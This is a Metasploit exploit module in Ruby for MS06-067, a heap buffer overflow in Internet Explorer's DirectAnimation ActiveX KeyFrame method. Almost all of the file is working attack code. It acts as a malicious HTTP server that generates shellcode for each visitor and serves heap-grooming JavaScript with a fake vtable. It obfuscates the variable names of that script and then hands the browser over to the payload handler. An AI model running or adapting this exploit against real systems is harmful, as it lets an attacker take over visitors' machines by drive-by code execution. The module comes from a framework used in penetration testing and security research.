##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
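class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  #
  # Superseded by ms10_018_ie_behaviors, disable for BrowserAutopwn
  #
  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :ua_name => HttpClients::IE,
  #  :ua_minver => "6.0",
  #  :javascript => true,
  #  :os_name => /^Windows/,
  #  :classid => 'DirectAnimation.PathControl',
  #  :method => 'KeyFrame',
  #  :rank => NormalRanking # reliable memory corruption
  #})

  # Registers the module metadata (name, description, references, payload
  # constraints and targets) with the framework.
  #
  # @param info [Hash] caller-supplied metadata, passed through update_info
  #   together with the defaults declared below
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability',
      'Description' => %q{
        This module exploits a heap overflow vulnerability in the KeyFrame method of the
        direct animation ActiveX control. This is a port of the exploit implemented by
        Alexander Sotirov.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          # Did all the hard work
          'Alexander Sotirov <asotirov[at]determina.com>',
          # Integrated into msf
          'skape',
        ],
      # Vendor fix and public write-ups for the issue this module covers.
      'References' =>
        [
          [ 'CVE', '2006-4777' ],
          [ 'OSVDB', '28842' ],
          [ 'BID', '20047' ],
          [ 'MSB', 'MS06-067' ],
          [ 'URL', 'https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          # Maximum payload size is limited by heaplib
          'Space' => 870,
          'MinNops' => 32,
          'Compat' =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      # Single target entry: no per-target options are set, everything
      # target-specific lives in the JavaScript built in on_request_uri.
      'Targets' =>
        [
          [ 'Windows 2000/XP/2003 Universal', { }],
        ],
      'DisclosureDate' => 'Nov 14 2006',
      'DefaultTarget' => 0))
  end

  # Serves the trigger page to a connecting browser.
  #
  # Builds a per-client payload, wraps the trigger script with heaplib,
  # renames the listed JavaScript variables via obfuscate_js, sends the
  # resulting HTML document and then hands the client to the payload
  # handler.
  #
  # @param cli [Object] the connected client; passed to regenerate_payload,
  #   send_response and handler
  # @param request [Object] the incoming HTTP request; not used by this
  #   handler (every URI gets the same page)
  # @return [nil] returns early when no payload could be generated
  def on_request_uri(cli, request)
    # regenerate_payload yields nil when a payload cannot be produced for
    # this client; there is nothing to send in that case.
    p = regenerate_payload(cli)
    return if p.nil?

    print_status("Sending #{self.name}")

    # This is taken directly from Alex's exploit -- all credit goes to him.
    trigger_js = heaplib(
      "var target = new ActiveXObject('DirectAnimation.PathControl');\n" +
      "var heap = new heapLib.ie();\n" +
      "var shellcode = unescape('#{Rex::Text.to_unescape(p.encoded)}');\n" +
      "var jmpecx = 0x4058b5;\n" +
      "var vtable = heap.vtable(shellcode, jmpecx);\n" +
      "var fakeObjPtr = heap.lookasideAddr(vtable);\n" +
      "var fakeObjChunk = heap.padding((0x200c-4)/2) + heap.addr(fakeObjPtr) + heap.padding(14/2);\n" +
      "heap.gc();\n" +
      "for (var i = 0; i < 100; i++)\n" +
      "  heap.alloc(vtable)\n" +
      "heap.lookaside(vtable);\n" +
      "for (var i = 0; i < 100; i++)\n" +
      "  heap.alloc(0x2010)\n" +
      "heap.freeList(fakeObjChunk, 2);\n" +
      "target.KeyFrame(0x40000801, new Array(1), new Array(1));\n" +
      "delete heap;\n")

    # Obfuscate it up a bit. Only the variable names listed here are handed
    # to obfuscate_js; NOTE(review): what it does to the remaining literals
    # (ProgID, method name) depends on obfuscate_js itself -- verify there.
    trigger_js = obfuscate_js(trigger_js,
      'Symbols' =>
        {
          'Variables' => [ 'target', 'heap', 'shellcode', 'jmpecx', 'fakeObjPtr', 'fakeObjChunk' ]
        })

    # Fire off the page to the client
    send_response(cli,
      "<html><script language='javascript'>#{trigger_js}</script></html>")

    # Handle the payload
    handler(cli)
  end
end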